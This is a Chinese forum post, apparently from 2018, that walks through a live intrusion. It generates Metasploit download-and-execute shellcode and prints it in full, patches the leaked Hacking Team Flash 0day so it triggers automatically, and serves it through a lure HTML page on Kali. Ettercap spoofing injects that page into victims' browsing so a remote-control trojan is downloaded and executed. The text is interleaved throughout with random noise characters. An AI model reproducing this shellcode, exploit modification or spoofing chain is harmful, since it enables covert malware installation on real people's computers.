|
' Q+ M0 Y2 Z% C. z+ F 三、flash 0day之手工代码修改制作下载者实例入侵演示
! W5 ^, g, t" f! N
/ B( q* {4 v; E6 G# ]
+ h9 Y8 O6 B) |5 q. M8 `- o" K 利用到的工具: 1 w$ p9 s; y2 T# l3 o4 f! Q
8 B+ u5 z2 g/ q; |$ h |' k
- N7 f4 M, l8 L& z% H+ S
Msf " t/ k$ ^/ p2 G) b, J
5 t4 L' U0 z5 m' J% K# F8 ?6 Y
5 r, Q3 u [* [5 e1 y! i. k" n* g Ettercap
6 q$ Z% f8 h2 \1 D) g4 q ; c4 L3 n& Q2 K& v' K$ e3 f
% c. M) k; c+ e5 _$ X; w
Adobe Flash CS6 1 R* H2 m c& V e7 d) o' G8 e
1 o1 @: K$ k5 g( }* P: m# m
( |* ]1 F* N- q7 n
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
& h: L8 p: D" e) X, m& v* ?4 m
* }/ J* C4 q" j% a# T# r6 ]& ~* Q7 r8 ^0 W( |) D7 L
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options ! M, O# g# u& c: F* G( ^
: m5 `1 e% @$ X
- O# i4 B( v& [, I3 V, n# o( ?1 ~
如图:
- ?9 a1 W0 P4 d6 m1 ~ |# z 9 V* D" O7 _1 G( S
7 e* U! ?2 [. l3 E) O: i9 F4 C
- \# V" i' L7 t/ _7 I
1 e- b0 N& j& ]6 |8 E0 Y7 w$ e
; m& T4 e+ ]7 T) K4 ^& ~  s8 C( v! a* O$ q0 f! k
& q- r( V1 D4 }- ~( a- O
, x0 V/ ?6 y' y5 }* ^7 b 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
9 @7 c6 \2 r4 r+ g% y8 q( m
/ G. l) t9 F* E, g7 J& d" g. E1 ^+ S5 Q
4 y8 Y" T. h ~
$ B) R) N9 R$ e0 }+ L
- }# Z9 @0 w( ^ h" ] 
' D/ J/ w5 s$ R* t# M, ~. r7 M q+ S+ s5 r4 ?! W
% L4 i! K W7 [% ^% S1 t8 l 然后执行generate -t dword生成shellcode,如下: 4 @* d" u! o3 I" C) G
t! Y% }. c/ Q' U
! C4 z5 k6 K2 b
 0 B- @( K0 Z6 |3 |1 e6 K
. `0 R; w& O9 D: |
- m" M9 L) P) |' K" V& {& x 复制代码到文本下便于我们一会编辑flash exp,如下: + |& J- q& [. d# y
& D# l: s! J8 v2 O* [5 G! \: s
! y$ {/ q- [: \ 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
" U/ T5 Z5 c3 J+ e
' L5 \6 s3 ^7 B0 X7 W+ Y" b; A5 N: z$ @0 D- j" H
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, / ~. y! `7 K! g0 G' x
j; K, v7 a4 i) b
* ]0 Q% J, X5 \8 E3 y 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
3 y* w% t! f0 v+ O/ E " X6 \" a" B5 ?0 N- D/ j
9 ]$ s0 _3 H+ ~ 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
4 |+ }2 C! d. ?: L: G. w
# J. J0 x; ?# q0 X
! Q0 l+ e& D I, x6 u, v 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, + H9 ^, I+ f/ X$ q
- Q5 H5 b) C3 R7 j2 n2 y8 `/ m! @2 N( P) K
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
/ {7 U6 o9 B' R* y . M6 H! i* P) z; V: z
8 ] c5 f- l) K; e0 Y3 X 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
& m$ N. K1 D0 ]: S: ]
9 m, M/ g! Q5 X' j, d4 |7 S4 k( V+ S: T
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, ) q2 S1 E; D; l$ N
$ Z) H4 ?2 {. s F- Q7 B" X( C+ V. ?1 O, u
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, # G! ^; Z' Z/ s4 N
' ^4 Q& } E5 ?& W- W7 |
& x( J8 ?, i1 X7 M' I
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, + e0 F* j* E- E/ _, W: _" P, Q
8 M2 p) c/ @9 I+ l
. K: a2 ^% a! j" y/ ~ 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
' b( G5 B t9 Y; ?; F( U6 ` 6 D' e2 @/ ?! k; p# e
2 Z, C+ ~& d1 u0 ?% o
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 0 x% [; e' N" {9 \6 d
+ o) \, Y$ [7 q! ^, L5 J7 [5 G1 ^0 B% O
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, / o+ a: m4 e1 T
: X+ v2 i" K# g0 ]( M
; v( i! p; o( r l+ g H$ ?4 C 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
3 b" ~/ N1 Y: E; d0 A, E) X 5 Y, F6 w- ^+ Y
4 Z- y2 G7 z5 H5 U% u' T
8 H/ _2 s, d) z- c9 ~* F
A1 p' k5 {( P% n% V+ T9 `0 _) W) O( `/ ]# M% m N
3 ?# ]. I4 G5 e; Y' `
: J$ v5 J$ v1 v( h7 r
' w a* X2 X8 o. n+ E; [0 j 下面我们来修改flash 0day exp,需要修改三个文件,分别为: w1 I3 L% E, T( P0 m' D
' Y+ x- ~$ Z1 b
; w" g1 u {0 ^, c3 I
 2 m; \5 T+ I m7 @8 s6 ^+ O
+ T. I$ f8 i* M2 Q: F
+ Y4 T+ N8 l1 s 先修改ShellWin32.as,部分源代码如图:
. b- |$ ~/ d% p' N: [& V/ M3 m* `
/ N. N6 A) Y) w2 K% f ]# V* H3 I% z* e- N/ d' P# B+ u
8 P% b N! N$ S& ?3 O& w% p2 i & g' m) S; |% [! e* v
5 w+ E" [: K) z0 ]; R, E2 _' f 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 8 |9 H( b5 H# l9 x
" A! _% I: _. f; @; \9 k7 d6 B9 [7 F0 Z( S0 [7 o- N" o
 2 Z: k8 f# o) s0 t
) ~) Z v$ y7 q% z$ n# e
# G, }( u" t/ b* V2 `7 J( Z; ` 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
0 |; W6 ]& V! C7 |! \ H4 f; F/ c1 x! I" m1 y3 n
% D! N4 ^' f" ~' w
: Y# q5 q, ~) r; X/ v p9 x0 J4 D8 y0 `( c( p# H, K
8 ~! v/ _: ]. _ 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: " {+ o- |# v* L; w
0 R+ A6 _' Q2 h0 S2 `( l; B; H, l! L
" A3 q ]% K+ C; g! `
2 v* d; H, Z/ B: T, e
; i: r- ]% f$ M* x% l
+ W2 l4 x7 { [; R; u
7 K% G$ y- T3 a5 q
6 S; J8 ?/ o8 t' z6 ?2 [
* r6 t8 o, w& R% X- k; g# ^8 R
0 _# j1 m, |: o; K, C" v7 D4 G4 y
6 A! f# W* A F 然后点保存,下面我们来编译一下,打开 ( G) b6 z2 J1 g1 Z. A
: }) l$ V8 s6 m8 \# `1 s: e: J& l1 ?5 n9 R% v" T# K3 h
exp1.fla然后点文件-发布,看看编译没错误
9 s4 u% {6 m# w( ^1 f1 p2 w3 b& ~$ g 0 O, ^3 [. q, H" i! K
# M1 f$ A: r+ w& E+ _: U M
$ N! t- p/ ?, U* @" v7 w; |
+ G9 E% |) E. r6 [) e0 `* Y* A5 n/ \3 W3 G* f4 P9 z1 Y
1 T7 N4 @5 U0 `
8 `- l8 Y7 K% v% `8 `3 }! [; @
7 \6 S' z) }, R ! |. P6 M- s' f# N
: c- _ k6 n6 L
1 t6 v% f3 ^4 g9 N. ~* A1 \ 
$ B7 [: M$ L/ Q& | . O, x. y: R; L3 N5 K( p3 w' K3 D' m
2 Y) {6 B- x' r$ B) Y2 [
然后我们把生成的 " y- M2 y8 m8 L# s
7 ]( U3 O; }% | n, H
/ B0 [; m# v* F" h5 n* P, E exp1.swf丢到kailinux 的/var/www/html下:
6 v' T1 K2 C+ b J" X( f$ j# n5 R ^ ! t# D7 d A+ I h# N Y
% @0 A; U) `0 a( R+ M 然后把这段代码好好编辑一下 5 ^7 ?1 y; |- C; L
2 u& D. H! y# ?# q Y3 S# v
, }8 d. l# C1 ~$ R ( O* a, n! u7 z% p) Q$ B/ d9 y1 E
, q3 T2 g( x7 F: j
* ^* X0 r, A5 _ 5 Q8 X- J8 u) Z0 L1 t
) J& s( c0 }7 }) N z+ S7 e0 Q p
5 }1 m! M. m: v' l0 k! _
! R1 ~, c4 |/ {. o, \ 5 s: G C% B! Z( @5 u
" l. q; A6 [9 m8 a; K9 k5 `/ W& |
6 w/ D+ C. B8 x6 R+ p9 M6 X
# e0 N |4 d" P8 r" `) g9 e2 A* q, i: U; J" Y
. _0 R6 w7 ^$ @: z : g( q, \9 @" i% r2 S0 p' V6 O
4 M8 [6 c/ M' l B- a( g
/ B0 \' f) X. y) O- [! R
8 ^6 e- a6 h+ v$ ]" E
1 G& D8 `, H$ U% J8 L( \( y <!DOCTYPE html> 4 l4 B/ H. x" A6 C& \4 M- X
. d% Z( h, M n# ~+ w( z1 j( n) i) Q& d* @& \6 O' i
<html> / G m( L0 T3 }/ }$ y
" A% f5 P# n( f$ k
+ k) C; e9 j y& D. l1 i% w, Y) h
<head>
% p! n- A8 @' ^0 Z' y
! F$ D" D5 |$ @" e* S, ]# ~# p! f; K* j
<meta http-equiv="Content-Type" content="text/html;
" D R- }( i+ E' n+ c! [# n6 }* h8 e6 S9 J $ F7 d( C! w! \+ E- ]! \3 P" v ~
9 {( q0 M& b5 A7 T W E charset=utf-8"/> " ]7 r, ~. J7 e: _* P3 U
w1 c, C/ ?6 E6 g
8 @$ s& i- X( H </head> % e8 p0 N5 j7 {9 O3 A
6 _9 B; `2 e+ G% c
; r1 z) m4 {8 x# R. @ <body>
8 B5 Q' a( ^; I3 r5 k) o' ` 8 p; ~: b) K1 T& _/ w7 W
) g) ~. M- T8 w `9 Q. P8 ^ <h2> Please wait, the requested page is loading...</h2> , W, l) |. e k3 p9 P, O
7 ^+ y8 R! z" `# d1 P; s
- L/ T/ j. m0 c. D# s, V4 Q <br>
3 D$ j7 X: }$ r
8 c' g; h5 U) F7 K
; a1 R- X/ z, _/ M% K <OBJECT
3 Z) w/ b2 M3 ^9 }. z3 Y
4 H" M/ K! v7 A% z: Q R% ^; K
3 A3 o, i/ R! _( M: x2 O ]/ W7 S classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
3 G0 Y% W: }; ~) F0 S 9 @: e; h: j5 S. y& e
7 a/ T. o& D* r. f) [6 U, c6 F VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
8 ]3 l8 V. G5 m3 R# V3 H
1 D. l/ ^( K% R1 t5 ?; \
8 k& ^* f ?& [, g& D; L </body>
$ Z2 t- w- G7 f) e; b( y ' F0 s9 {+ E- W- J" c
* N" s! U3 }: r) e# T3 I
<script> + t& N2 m( \$ a }9 A! j+ \
. |% t) H) C# F& G
5 D7 R& G4 V" o' z) c0 [ setTimeout(function () { # @0 F$ c' }8 l9 k2 [# I
9 i9 x) p' c! _) E0 x |0 o* A- F% h$ T
9 A, h) E- _1 U* z; Q9 |
, y' c3 Q% b' c4 M o" y' P
$ a+ U% K4 Y; ~# D9 a3 r# t2 P& e3 H
window.location.reload(); 2 S$ \8 {( A) N% |8 Z+ S8 p
2 q9 M Y$ K" H6 y% ~7 u
- Q( @! m6 C3 H
}, 10000); 4 j% v8 `3 E* s
9 d3 h; h. c/ Z0 S! z$ N0 R
) K& P2 P% J8 Q; F# H! Y
) I. h9 D: k' q3 W" r# e- t 7 a5 k$ `3 u! `
, E4 f5 g% [3 G+ T; V </script> 6 \6 p$ r4 \* V/ c7 s: S+ s
0 e- R! a% h' d$ D9 v
2 I m- c& P4 o* K& M/ A </html>
1 K9 L+ `2 J9 [& M
: P. v A/ p' X0 o! d4 N+ W" S; |* t( y( i! k) A- J" Y
* U1 z/ o" \% l+ @' u
2 O4 m: F5 \9 q! o+ A3 T% S8 c2 v
8 m. T% K/ G( a9 x) p 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: - \4 C' j3 S N5 w/ o, S4 B
1 U7 y3 ?' T5 l4 j! k
) k& J8 S; A7 x9 b* Q! O$ ^
! c- ^% \2 [( ~$ H. ~" G6 ]( D 1 ~7 o) t6 Z9 c2 u% M J8 h
8 x4 N- ]1 o3 k8 y1 f6 U1 a 6 H! p6 r0 W# [1 Y! C
. I% h8 c& x3 g( g5 `2 `, D
: p; y4 D5 T! c2 c' S+ ~! V
+ [# p3 h- i8 n3 o 8 y5 r7 C3 l; e7 }! P; X' L+ S
8 u; q9 J5 H2 a+ D+ O W3 j5 G2 I
" p- L4 h7 \! {! \5 B ; y; F6 I* T; ^) W$ N, t- _
- A6 J7 n' ?6 w% _6 ~& C0 |
+ o* A9 ~$ t7 j8 l y8 \, O7 j
6 y# G' y* ]( n
, `( A* {# _- L2 G 下面我们用ettercap欺骗如图:
2 N6 {* O- ?. Z/ R
* N& W$ O9 r! j- P: s; P+ [( y2 X) j% Y1 X6 j$ ~' ^/ ~! P
 8 `: W+ v& [0 y& a: |+ c
/ M2 e- D5 b2 B5 u# ] s, |
# f0 H8 `9 [* b+ m I
% K9 A2 X4 z# s3 O" S5 _
& A* {+ B% l& i& ?4 c
' ^' d2 _0 i3 H 下面我们随便访问个网站看看:
% J, P* V( `8 T% l
; ^1 z! F3 n, u% C8 M5 E' F% r' E& ^
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
) U2 Q. E; V$ Z8 f, T, l 6 B+ b* b" |* d2 z* s
@; f! G- E+ b
$ v" X% c. n& N3 G
* B$ F0 R+ [" b- B" k( S) t8 I. f7 L
( D: p, x6 f! | o2 K 我们看另一台, + l$ @! K8 _! @9 b r/ \
/ Y! h4 S! I: f8 ?( F, [* U Z) P. S
2 }% \+ X/ ]6 {1 W8 z3 H7 t. f 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
% X2 g0 f6 Y4 N% h, T! k! k | 
发表于 2018-10-20 20:28:55
收藏
支持
反对